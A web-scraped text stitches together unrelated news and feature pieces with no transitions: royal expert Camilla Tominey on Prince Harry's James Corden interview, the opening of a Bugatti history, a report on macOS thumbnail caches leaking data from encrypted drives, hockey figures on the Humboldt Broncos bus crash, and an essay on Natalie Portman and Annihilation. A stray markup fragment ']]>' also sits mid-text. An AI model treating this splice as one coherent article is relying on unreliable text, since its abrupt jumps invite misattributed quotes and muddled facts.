Prince Harry has hit headlines overnight following a chat with The Late Late Show host James Corden. During the chat, the royal opened up about his departure from the Royal Family as well as things like Netflix drama The Crown. However, the interview became a topic of discussion between the This Morning presenters given Harry and wife Meghan Markle’s insistence on privacy, with royal expert Camilla Tominey issuing a stark reminder to the pair and fans alike. Hosts Dermot and Alison were keen to hear Camilla’s thoughts on the move by Prince Harry as he and Meghan are also penned in for a high-profile chat with Oprah Winfrey in the not-so-distant future. “It’s an interesting rewriting of history,” Camilla began. “If you think of the Megxit statement.” Camilla then claimed Harry and Meghan’s step into the spotlight is part of their plans to almost dictate how they’re perceived in the press. “This is about press controls and saying we want publicity but only if it’s favourable to us,” Camilla said. READ MORE: Royal photographer claims William and Kate ‘friendlier’ than Meghan She warned: “Whenever there is a story about someone high profile….that’s a two-sided story, you can’t just give one side. “We know the Queen is saddened and disappointed – you can’t just ignore that side because they claim they were unfairly treated [by the press].” Delving further into the new interview by Harry, Camilla discussed the dilemma of keeping up a famous profile while aiming for privacy. Discussing the James Corden interview, Camilla weighed in: “I think he comes across really well, “But this is Harry as we know and love him, right?” she continued. “There is this sense that maybe in recent months the couple has lost their sense of humour a bit. “They’ve taken themselves a bit too seriously in some of their earnest endeavours and I have no criticism of them wanting to do charitable work and everything else, “But there’s been this sense of they’ve been on the fringes thinking that they’re very important without filling it with much substance.” Camilla went on: “What we see here is the Harry that we know and love, and of course that should be welcomed, “But at the same time, you cannot simply turn on the tap of publicity just when it suits you. “When everything’s going well and the headlines are always good and pretend that you exist without any negative headlines either. “I think that’s a tricky game to play,” the royal expert added. Camilla then dished out some words of advice for Harry and Meghan if they are to go down the route of acting as “private citizens”.

Bugatti in 2018 is precisely where corporate parent Volkswagen wants it to be. The Alsatian automaker is once again known the world over for making what some consider to be the ultimate road car: a V16 engine with four-digit horsepower, a top speed so fast no tire can handle it, and a build so over-engineered it has a seven-digit price tag. We’re living in the second heyday for a marque that first rose to prominence almost a century ago.
That first golden age was built at the race track. The company’s most famous machine was the Type 35, a car you could drive to a Grand Prix, win, and then drive home—assuming you had the talent and could afford one, obviously. In its latest incarnation, Bugatti has largely avoided competition. But in the mid-1990s, just before VW assumed control of the storied name, it had another go at finding a motorsports halo.

Unbeknownst to many people, a macOS feature that caches thumbnail images of files can leak highly sensitive data stored on password-protected drives and encrypted volumes, security experts said Monday.
The automatically generated caches can be viewed only by someone who has physical access to a Mac or infects the Mac with malware, and the behavior has existed on Macs for more than a decade. Still, the caching is triggered with minimal user interaction and causes there to be a permanent record of files even after the original file is deleted or the USB drive or encrypted volume that stored the data is disconnected from the Mac. Patrick Wardle and Wojciech Reguła, who are macOS security experts at Digita Security and SecuRing, respectively, said for many people, it’s unnecessarily risky to store snapshots of files related to passwords or other sensitive matters in an unprotected folder. In a blog post published Monday, they wrote:
For a forensics investigation or surveillance implant, this information could prove invaluable. Imagine having a historic record of the USB devices, files on the devices, and even thumbnails of the files…all stored persistently in an unencrypted database, long after the USB devices have been removed (and perhaps destroyed).
For users, the question is: “Do you really want your Mac recording the file paths and ‘previews’ thumbnails of the files on any/all USB sticks that you’ve ever inserted into your Mac?” Me thinks not…
As the researchers note, the caching may cause there to be a permanent record of every drive that connects to a Mac. It also creates a thumbnail image that can leak key details about many of the images stored on the drives, as well as password-protected folders or encrypted volumes. The thumbnails will live on in an SQLite database stored indefinitely in the macOS file system.
]]>In minor sports, travelling between far flung outposts by bus is usually where one learns about their teammates and deep bonds are forged.
“It’s as important as the ice. You need three things to play a game: players, officials and a puck,” Edmonton Oilers coach Todd McLellan told reporters.
“But for all of those things to happen you’ve got to get all of those people to the facilities and when you are travelling in large groups you are on a bus.”
It was late Friday evening when the charter bus carrying the Humboldt Broncos junior A hockey team collided with a semi-trailer at an intersection northeast of Saskatoon.
Fifteen members of the team and organization were killed. The Saskatchewan Junior Hockey League team was heading to Nipawin, Sask., for a semifinal game against the Nipawin Hawks.
McLellan is a Saskatchewan native and spent years playing and coaching in the province. He has been on countless bus trips like the team from Humboldt.
“There are nights three, four o’clock in the morning, freezing cold, conditions aren’t that great and they are pushing through it. [The bus] is part of the fabric of our game.”
Humboldt Mayor Rob Muench echoed McLellan’s thoughts.
“This tragedy has hit a number of people, not just us, but I think everybody can relate to this experience,” said Muench.
“Throughout Canada we see teams going out into the Canadian winters on buses all the time, and it’s always a thought in parents’ and fans’ minds about what can happen and unfortunately has happened here.”
Maybe that’s why the outpouring of emotion from the hockey community has been so raw and genuine.
They have all spent many joy filled hours on the bus. A place often recalled as a safe, impenetrable cocoon away from the ice.
“Everyone in hockey has done it. In junior, you are travelling these far distances. That’s why it hits home, everyone has been on that bus before,” Oilers forward Connor McDavid told reporters.
“You are with all of the boys and having a good time. And it never crossed my mind that something like that could happen when I was on the bus. We would hit the rumble strips or something and guys would laugh and think it was funny and never thought anything would happen. I saw it as a haven, a safe space.”
“Some of the best times you spend with your teammates is on the bus,” said Maple Leafs forward Tyler Bozak. “All of us has spent lots of time on buses and it’s just a tragedy.”
“You create a lot of memories there. That’s where the majority of time is spent with your coaches and teammates. You feel safe there and never feel like anything could happen.”

Canadian hockey legend and Saskatchewan native Hayley Wickenheiser said when you’re young you savour the experiences of travelling with teammates.
“Early on in your career, you get on the bus and you feel pretty invincible. At 18,19 years old you don’t ever think anything like this could happen. You feel pretty protected and secure on the highways because you are bigger than most vehicles,” Wickenheiser told CBC.
“The bus is a place where only the team can go. A lot happens on the bus; it has its own kind of weird dynamic.”
The four-time Olympian said the culture of the bus is so entrenched across sports that she knew who had likely been hurt in the accident.
“When I heard a semi hit the front of the bus, I knew who would have been wiped out. It’s usually the staff and the rookies in the front and the veterans in the back.”
Wickenheiser said that as her career went on, she became more wary of extensive bus travel.
“You start thinking about some of the ‘what ifs’ and some of the conditions we were driving through. We would go through snowstorms and come upon accidents in some sketchy conditions on these very roads across Western Canada. So it’s very real, it hits home.”

Natalie Portman is always proving herself.
It’s not a conscious effort, not some desperate act of retribution. There’s nothing cloying or even necessarily deliberate about her methods of reinvention, if you can even call it that. She’s been a professional actress since she was 11 years old. She’s a Harvard graduate, a wife and mother, an Oscar winner. Her career is peppered with both high-caliber performances and less sexy – but certainly more impressive – scientific accolades. She’s a woman who’s starred in three Star Wars films and penned an academic study called “Frontal lobe activation during object permeance: data from near-infrared spectroscopy.”
And yet, she still feels under-appreciated, occasionally disregarded. Her new film, Annihilation, is a reminder that she’s one of the finest, and most interesting, actresses working right now.

Some of that is due to her fiercely self-protective instincts, which might appear more self-righteous than cautiously – and understandably – guarded. Portman supposedly pulled out of her Marvel contract after Patty Jenkins was fired as the director of Thor 2. She doesn’t participate in Star Wars fan events like many of her prequel-era co-stars. At age 14, she was slamming director Adrian Lyne for his “sleazy” films, dismissing herself from his Lolita remake to avoid sexual exploitation. (In a recent interview with BuzzFeed, Portman admitted that post-The Professional, “Everything I was being offered was, like, sexy little girls.”)
It’s disheartening, as a fan, to see how poorly Portman is often regarded. There are rampant claims that she’s too much of a “freaky baby,” that she “ruined the Thor movies,” when her choices and comments are admirable takedowns of the sexist and dangerous Hollywood system she grew up in.
These aren’t universal complaints, of course. Portman is still an Academy Award-winning actress, a major star of beloved films, a self-referential rapper (“Say something about the motherfucking prequels.”), and a loud, proud voice in the #TimesUp movement. She recently joined Instagram, a for-the-people PR move that’s sure to garner goodwill. And now, perhaps most excitingly, she’s the lead of a film that feels like the culmination of everything her career has been building towards: the complicated, transcendent Annihilation.

As a pre-teen, Portman was a member of the World Patrol Kids, a kids band that sang about environmental issues. In addition to her frontal lobe study, she also co-authored a paper about “the enzymatic production of hydrogen from sugar.” She has a degree in psychology from Harvard, and studied at the Hebrew University of Jerusalem. Academia and science are as important to her as acting, which is why her role as a biologist in Annihilation feels especially tangible – like she can finally express her extracurricular achievements through a performance, and send a message about female intellectualism and psychology in the process.
“I’ve never come across some of these questions that [director Alex Garland] poses, and found it really fascinating the way he connected the interior psychological world of these women with their environment,” Portman told BuzzFeed about her role as Lena, a former Army officer and current biology professor at Johns Hopkins University. In the opening scenes, we see Lena teaching a class about molecular biology; Portman looks right at home in the part, as if, in another world, this could be her reality. (Portman was a guest lecturer at Columbia University in 2006.)
This isn’t the first time Portman has played a scientist onscreen: her Thor character, Jane Foster, was an astrophysicist. “What a great opportunity, in a very big movie that is going to be seen by a lot of people, to have a woman as a scientist,” she told the LA Times in 2010 about her decision to take on the stereotype-shattering role. Though Jane was eventually written out of the MCU films, there’s no question that Portman’s Annihilation character was a chance to evolve that idea, and to include even more women in the discussion this time around.

Portman has always been an outspoken advocate, but the #MeToo and #TimesUp movements have positioned her firmly in the awards season spotlight. She’s used the opportunity to name-check Dylan Farrow in a televised condemnation of Woody Allen, apologize for signing a petition to grant accused rapist Roman Polanski immunity in the Unite States, and to call-out the whitewashing in her new film. She’s also been sure to name-check other women in the movement, like Reese Witherspoon, who are hoping to change Hollywood’s systemic sexism and stop its cycle of sexual abuse.
What does this have to do with Annihilation itself? For starters, the film is a firestorm of representation. Fresh on the heels of Black Panther’s roaring success and trailblazing black cast, Annihilation is another feast of diversity, with female narratives and perspectives at its core. All of the leads are women, the three supporting male characters are all men of color. The film talks about mental illness, addiction, debilitating grief. One character is openly gay, another terminally ill. The women are mothers and wives, but they are also masters of their chosen fields, and the fact that they’re all female is barely highlighted – it simply is.
A film about women working together to overcome insurmountable odds is absolutely the sort of biting, female-focused work that’s indicative of #TimesUp. And that’s exactly where Portman has focused her vision.

In addition to the personally meaningful stuff, Annihilation really solidifies Natalie Portman as a purveyor of eclectic, risky projects. In the last five years, she’s starred in two tricky Terrence Malick films (Knight of Cups and Song to Song), played an iconic first lady in Pablo Larraín’s magnificently bizarre Jackie (in an underrated, fearsome performance), and directed and starred in the Hebrew-language film A Tale of Love and Darkness, adapted from Amos Oz’s autobiographical novel of the same name. Though her entire acting career has been punctuated with bold choices – including her Oscar-winning turn as a tortured ballerina in Darren Aronofsky’s Black Swan – her recent efforts further prove she isn’t sleepwalking her way through easy Oscar bait, wasting away in franchise hell, or resting on a rom-com safety net.
There’s absolutely nothing safe about Annihilation. It’s a tour-de-force of hard science fiction, with a third act so poignant, large, and mystifying that it’s sure to enrage casual moviegoers. Portman is the center of the storm; the focus of the back-half’s immense weirdness. She handles it with knowing aplomb, an actress finally – wholly – in her element.
